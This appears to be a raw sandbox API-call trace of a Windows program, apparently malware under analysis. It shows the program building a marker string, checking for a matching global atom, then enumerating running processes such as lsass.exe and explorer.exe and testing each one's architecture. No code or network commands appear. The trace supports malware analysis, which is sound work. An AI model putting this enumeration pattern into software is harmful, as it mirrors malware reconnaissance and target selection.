	[0072.632] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.632] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.633] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.633] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.634] GetLastError () returned 0x5
	[0072.635] GetLastError () returned 0x5
	[0072.635] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.635] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.635] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.635] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.635] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.635] CloseHandle (hObject=0x224) returned 1
	[0072.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.635] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.635] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.635] CloseHandle (hObject=0x224) returned 1
	[0072.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.636] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.636] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.636] CloseHandle (hObject=0x224) returned 1
	[0072.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0072.695] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.701] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.703] CloseHandle (hObject=0x224) returned 1
	[0072.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.703] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.704] CloseHandle (hObject=0x224) returned 1
	[0072.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728958, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.704] CloseHandle (hObject=0x224) returned 1
	[0072.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.704] CloseHandle (hObject=0x224) returned 1
	[0072.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.704] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.705] CloseHandle (hObject=0x224) returned 1
	[0072.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.705] CloseHandle (hObject=0x224) returned 1
	[0072.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7288b8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.705] CloseHandle (hObject=0x224) returned 1
	[0072.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.705] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.705] CloseHandle (hObject=0x224) returned 1
	[0072.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.706] CloseHandle (hObject=0x224) returned 1
	[0072.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.706] CloseHandle (hObject=0x224) returned 1
	[0072.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.706] CloseHandle (hObject=0x224) returned 1
	[0072.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.706] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.707] CloseHandle (hObject=0x224) returned 1
	[0072.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728a38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.707] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.707] CloseHandle (hObject=0x224) returned 1
	[0072.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc30, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.707] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.707] CloseHandle (hObject=0x224) returned 1
	[0072.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.707] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.707] CloseHandle (hObject=0x224) returned 1
	[0072.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e798, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.707] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.707] CloseHandle (hObject=0x224) returned 1
	[0072.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728878, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.708] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.708] CloseHandle (hObject=0x224) returned 1
	[0072.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.708] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.708] CloseHandle (hObject=0x224) returned 1
	[0072.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.708] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.708] CloseHandle (hObject=0x224) returned 1
	[0072.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
